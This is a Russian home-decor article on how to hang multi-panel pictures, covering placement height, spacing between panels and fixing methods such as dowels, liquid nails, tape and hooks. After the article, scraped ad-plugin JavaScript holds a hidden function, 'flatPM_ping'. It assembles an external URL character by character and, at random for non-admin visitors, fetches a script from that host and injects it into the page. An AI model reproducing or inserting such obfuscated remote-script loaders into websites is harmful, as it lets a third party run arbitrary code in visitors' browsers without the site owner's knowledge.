9 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как правильно повесить модульную картину

Первое, на что стоит опираться при выборе украшения – тип отделки стен. Если помещение выкрашено однотонной краской или облицовано декоративной штукатуркой, стена станет отличным фоном для яркого акцента в виде изображения.

Если комната или кухня оклеена обоями с пёстрым рисунком, размещать картину из модулей не рекомендуем: она потеряется среди принтов и перегрузит обстановку. В качестве альтернативного варианта можно выбрать композицию из чёрно-белых изображений.

Картина из нескольких составляющих выглядит гармонично, если размещена на правильной высоте – это примерно 165 см от пола по нижнему краю. Не советуем располагать декор «на глаз»: все размеры должны быть выверены с помощью уровня.

Если располагать композицию в изголовье кровати, над комодом или столом, то её ширина должна равняться хотя бы половине длины этого объекта. Желательно размещать ровно по центру. Если вешать триптих над диваном, он может занимать 2/3 длины спинки.

Также необходимо учитывать зазоры между элементами: чем больше фрагменты, тем дальше они должны располагаться друг от друга. Оптимальное расстояние – от 2 до 4 см: это обеспечит композиции целостность.

Если помещение маленькое или заставлено мебелью, нельзя вешать модульные картины огромных размеров. Если необходимо зрительно вытянуть потолок, можно разместить фрагменты вертикально. Горизонтальное расположение наоборот расширит комнату.

Повесить модульную картину можно двумя способами:

  • используя крепежи без сверления
  • либо с помощью саморезов с дюбелями, для которых нужны отверстия в стене.

В зависимости от материала, из которого сделаны стены, понадобится либо дрель, либо перфоратор. Перед тем, как вешать модульную картину, советуем собрать её фрагменты на полу и измерить расстояние между ними.

Композиция из трёх элементов называется триптих, из пяти – пенаптих. Если деталей больше – это полиптих. В качестве главного ориентира при размещении триптиха служит его центральная часть, а у пенаптиха, если он состоит из разных изображений, существует множество вариантов раскладки.

Для того, чтобы закрепить модули на стене, потребуется минимум по одному отверстию на каждый фрагмент. Поскольку композиция может быть тяжёлой, крепежи должны быть надёжными.

Правила и рекомендации по размещению картины

Перед креплением картин требуется определить их расположение в соответствии с общими правилами и дизайном помещения:

  1. Для декорирования небольших комнат используются диптихи либо триптихи. Для просторных помещений используются работы с большим числом элементов.
  2. Визуально увеличить высоту потолочных перекрытий поможет вертикальное изображение. Для зрительного расширения стен требуются горизонтальные изображения на модулях.
  3. Массивные конструкции не рекомендуют размещать рядом с комплектами мебели, т.к. визуально это перегрузит пространство.
  4. Важно учитывать освещенность участка комнаты. На масляные картины не должны падать прямые солнечные лучи для предотвращения выцветания красителей. Для масляных картин подходят затененные пространства, т.к. недопустимы блики на поверхностях модулей.
  5. Картины развешивают на расстоянии не меньше 1,5 м от поверхности пола, чтобы изображение было в центре внимания входящих в помещение.
  6. Между полотнами требуется оставить небольшой зазор, не рекомендуется оставлять большое пространство. Оптимальный размер — 1,5-2 см. При ограниченном пространстве можно приблизить блоки на максимальное расстояние.
  7. Перед развешиванием композиции требуется разложить элементы на полу и визуально оценить гармоничность комбинации.
  8. Затем за основу при монтаже берется нижняя либо верхняя кромка большого элемента композиции, от которой размещаются остальные части. В картине из 5 модулей за основу берется средний элемент. Блоки размешают по одной линии.

Как правильно вешать модульную картину на стену?

Прежде, чем вешать, отправляемся в магазин и покупаем подходящие полотна. Принеся домой, обязательно распакуйте и проверьте целостность. Теперь все элементы модульной картины положите на пол. Теперь нужно на полу расставить картины так, как они будут видеть на стене. Так вы уловите перспективу и заранее продумаете что и где будет. Можно периодически прикладывать холсты к стене. Если вешать сразу, то можно потом получить совсем не тот результат. Кстати, справится с симметричными элементами будет гораздо проще, чем с асимметрией.

Для крепления вам нужны будут молоток и гвозди, уровень и рулетки для измерения, а также карандаш для пометок. Когда все готово, переходим к пошаговой инструкции о том, как вешать такие картины на стену:

  1. Выбираем стену, на которой будет располагаться модульная картина. Композицию раскладываем на полу в готовом виде, чтобы потом поочередно переносить каждую часть на ее место.
  2. Лучше всего начать с центральной детали либо же с самой габаритной, в случае с разными формами. В случае с нечетным количеством картин просто выбираете центральный элемент и отталкиваетесь от него. В случае с четным количеством центром станут сразу две детали и контролировать нужно будет сперва расстояние между ними.
  3. Измеряем параметры каждого элемента и переносим отметки карандашом на стенку. Вешать будем именно то ним, на уровне глаза либо слегка выше. А вот ниже будет неуместно. Помните, что любые свои действия в работе с декором следует проводить под проверкой уровнем. Кривая картина не просто будет выглядеть нелепо, но и со временем начнет раздражать вас.
  4. Сделать лёгкое отверстие в стене (в зависимости от кого, какая у вас стена). Дальше вбивается дюбель-гвоздь с шурупом, тонкими гвоздиками и т.п.
  5. Закрепить центральные детали композиции, проверить их ровность уровнем. Отмеряем расстояние, делаем пометку для следующего элемента и крепим его уже.

Придерживаясь данных простых шагов, вы сможете быстро и без труда приделать картину на стену.

Сложные методы фиксации картин

Сложные методы отличаются от простых двумя нюансами — сложностью установки и надежностью. Они позволяют зафиксировать картину на долгий срок, осуществив ее надежное скрепление с поверхностью позади. Среди них отмечают:

  1. Жидкие гвозди
  2. Вспененный двухсторонний скотч
  3. Полимерный клей
  4. Шканты
  5. Система Command

Хотя использовать их не так трудно, существенно усложняет установку то, что фиксация создается постоянная. Другими словами, установив лишь раз, в дальнейшем нельзя будет сменить расположение картины, поправить ее или опустить ниже. Поэтому первая установка должна осуществляться профессионалом, использующим инструменты для определения угла наклона и оптимального расположения этого элемента декора.

Первый метод заключается в использовании жидких гвоздей — специального клея, позволяющего намертво склеить поверхности между собой. Им легко пользоваться, а установка может осуществляться на любой поверхности независимо от веса картины, места установки, поверхности и других факторов.

Второй — вспенивающийся скотч. Такой скотч быстро скрепляет поверхности за счет химической реакции. Но его особенности такие же, как и у клея — он крепится лишь раз и на долгий срок. Но не стоит использовать его на фактурных обоях и других поверхностях с неоднородным покрытием, качество фиксации будет низким.

Следующим идет полимерный клей. Он не оставляет жирных следов и позволяет фиксировать картины любого веса и размера. Однако застывает он долго, что приводит к надежному креплению на любой поверхности.

Далее используются шканты. Они чаще используются для таких задач, ведь обеспечивают надежное и съемное крепление для подобных предметов. Шканты являются пластмассовыми или деревянными изделиями, размещающимися в стене. На самой же картине создаются отверстия или размещаются специальные элементы, зацепляющие выступ.

Система креплений Command — довольно простой и доступный метод, хотя и используется профессионалами. Это система липучек, не оставляющих следов на стене и картине. Комплекс подобных фиксаторов позволит установить съемное крепление на поверхности, при желании снимая его.

Такие позволяют на длительный срок зафиксировать картину, некоторые из них обеспечивают съемное соединение. Это стоит учитывать при выборе.

Видеоуроки

Как видно из алгоритма изготовления, модульные картины состоят всего из нескольких деталей: нужна только основа и ткань, бумага или холст для конечного оформления. Далее все необходимо правильно соединить – и картина готова. Тем, кто предпочитает вещи, сделанные самостоятельно, такие мастер-классы особенно пригодятся. Более наглядно они описаны в видеороликах, после просмотра которых легко соорудить любую составную картину.

Пошаговый мастер-класс для начинающих

Как нарисовать цветы

Как повесить модульную композицию?

Сегменты композиции можно повесить с помощью следующих приспособлений:

  1. гвоздей и дюбелей;
  2. жидких гвоздей и клея;
  3. двухстороннего скотча или липучек;
  4. умного фиксатора;
  5. крючков-паучков;
  6. других подручных средств.

Перед тем как разместить все на стене, рекомендую:

  • Расставить части картины возле нее. Это делается для того, чтобы предварительно посмотреть, будет ли композиция хорошо смотреться.

Нужно предварительно оценить, как будет смотреться картина

  • Перед тем как вешать сегменты, учтите их вес и тип стены, на которой они будут крепиться.
  • Располагать изображение нужно на высоте 1,5 метра от уровня пола, чтобы рисунок находился на уровне глаз.
  • Начинать нужно с главного сегмента, затем отступая 2-3 см крепить остальные части.

Разложите элементы на полу, чтобы окончательно определиться, как лучше их закрепить

Холсты стоит располагать так, чтобы на них не попадали прямые солнечные лучи.

Способ 1. Гвозди и дюбели

Расскажу, как крепить модульные картины к стене при помощи сверления или гвоздей. Этот способ наиболее распространенный. Но он не подойдет тем, кто хочет оставить стены в сохранности.

Со временем захочется переместить композицию или поменять ее, а после монтажа останутся отверстия. Поэтому подойдите серьезно к выбору места расположения элементов декора.

Крепим картины с помощью гвоздей и сверления

Если вы готовы сверлить стены и вбивать гвозди, то порядок действий таков:

  1. Обводим углы главного сегмента.
  2. Сзади картины есть приспособления, с помощью которых они крепятся к гвоздям. Замеряем их расстояние.

Приспособление для крепления есть на каждой рамке

  1. Делаем отступ внутрь на нужное расстояние.
  2. Дрелью сверлим отверстия и вбиваем дюбели.
  3. Вместо сверления стен можно забить гвозди.
  4. Вешаем главный сегмент.
  5. Аналогично развешиваем остальные части.

Можно использовать обычные гвозди и молоток

Способ 2. Жидкий клей и гвозди

Существует много способов крепления для картин без сверления. Одним из них является применение жидких гвоздей или клея.

Можно применить жидкий клей или гвозди

Жидкие гвозди прочно соединяют поверхность полотна со стеной. С их помощью можно вешать композицию даже в спальне и не бояться, что она упадет.

Этот метод станет отличной находкой, если будете вешать предметы на кухне. Тепло и влажность не помешают красоте. К тому же клей на основе полимеров не оставляет жирных пятен.

Влажность и тепло – не помеха декоративным элементам, закрепленным с помощью жидких гвоздей

Инструкция крепления на клей:

  1. В зависимости от веса холста промазываем весь периметр либо отдельные участки.
  2. После этого прижимаем изображение к поверхности стены, крепим, и оставляем на ночь.
  3. Следует чем-нибудь подпереть конструкцию, чтобы клей моментально схватился.

Жидкий клей не оставляет жирных пятен

Способ 3. Скотч и липучки

Еще одни метод, как повесить на стену модульную картину без гвоздей – использование скотча и липучки.

Двусторонний скотч подойдет для гипсокартонных поверхностей. Клеим несколько кусочков на холст и крепим его к стене. Но стоит учитывать, что тяжелое полотно скотч не выдержит. Лучше всего выбирать скотч на тканевой основе.

Есть также вспененный скотч, который крепится непосредственно на стену:

  1. Наносим его на поверхность.
  2. Снимаем защитную пленку.
  3. Крепим на него холст.

Не следует наносить вспененный скотч на обои с фактурным принтом. Такое крепление долго не продержится.

Липучки для картин на стену можно купить в швейном магазине:

  • Одну липучку крепим к стене, используя клей, другую – на элемент композиции.
  • Количество таких приспособлений зависит от размера полотна.
  • Такой способ особенно понравится тем, кто часто меняет обстановку, передвигает мебель и предметы интерьера.

Специальные липучки

Способ 4: Умный фиксатор

Можно также приобрести умный фиксатор для крепления предметов. Он представляет собой полиуретановый прямоугольник, который крепится к поверхности.

Главным его преимуществом является многоразовое использование. После применения нужно всего лишь промыть поверхность теплой водой. Инструкция гласит, что фиксатор выдерживает вес до 2 кг, не оставляет жирных следов, он прост в использовании.

Умный фиксатор

Способ 5: Крючки

«Крючки-паучки» имеют металлические стержни, которые находятся сзади:

  • Такие крючки подойдут для поверхностей без обоев.
  • После демонтажа остается 4 маленьких отверстия.
  • Этот крепеж надежный, но выдерживает композиции весом до 2 кг.

Крючки-паучки – отличное решение для бетонных стен

  • Крючки для картин на клейком основании выдерживают картины до 1 кг. Крепления просты в применении.
  • Нужно всего лишь приклеить крючок к поверхности и повесить картину.
  • Спрятать его можно, если подобрать кусочек обоев в тон.

Крючки для разного веса

Картины из модулей

Модульная картина – важный элемент современного дизайна, она может украсить интерьер гостиной, спальни, кухни или детской комнаты. Состоит из двух, трех, четырех и более частей. Чтобы повесить модульную картину, необходимо определить последовательность размещения ее частей. Начинают крепление с основного модуля. Определить его просто – здесь изображена главная композиция.

Чтобы картина висела ровно, важно учесть некоторые нюансы.

  • Приложите главный модуль к стене и очертите карандашом его границы.
  • Верхняя часть картины должна быть размещена параллельно полу, иначе вся композиция будет висеть под углом, что не придаст эстетичного вода помещению.
  • Между частями композиции должен быть отступ шириной 1,5-4 см, его также стоит заранее отметить.
  • Приложите к стене остальные детали и также разметьте их углы.
  • Очистите поверхность от загрязнений.
  • Прикрепите детали выбранным способом.
  • Оцените результат и при необходимости внесите корректировку.

Стандартный вариант установки полотна на стену

После выбора изделия и выбора места его расположения можно приступать к монтажу. Для этого нужно сделать следующее:

  • Отмерить рулеткой место крепления центрального фрагмента и отметить его карандашом (лучше обвести контур, приложив изделие).
  • Просверлить отверстие в месте крепления и вбить в него дюбель, в который вкрутить саморез.
  • Установить основную часть и проверить правильность ее расположения уровнемером.
  • Таким же образом монтировать следующие фрагменты.

На заметку! Для сохранения целостности композиции лучше не делать большие промежутки между элементами. Оптимальный размер – 2-3 см.

ЧТО ПОЧЁМ?

Так что влияет на цену модульной картины? «Конечно же. количество модулей!» — ответите вы. Не только. Дело в том, что модульные картины могут печататься на совершенно разных поверхностях: полиэстере, натуральном холсте и даже на поверхности, имитирующей фреску или мазки масляной живописи. Для дополнительной защиты изделия могут быть покрыты специальным лаком, что также влияет на стоимость. Но обо всём по порядку.

Как бы ни были заманчивы предложения купить модульные картины по ультранизким ценам, зачастую это уловки с целью завлечь вас на свой сайт. Приобретая картины в специализированных магазинах, вы не только получите качественный товар в срок, но и гарантию от производителя.

Конечно, чем меньше сегментов, тем дешевле обойдётся картина. Естественно, при условии, что тип поверхности у сравниваемых картин одинаковый.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"<$1>$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n<=0&&(clearInterval(r),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};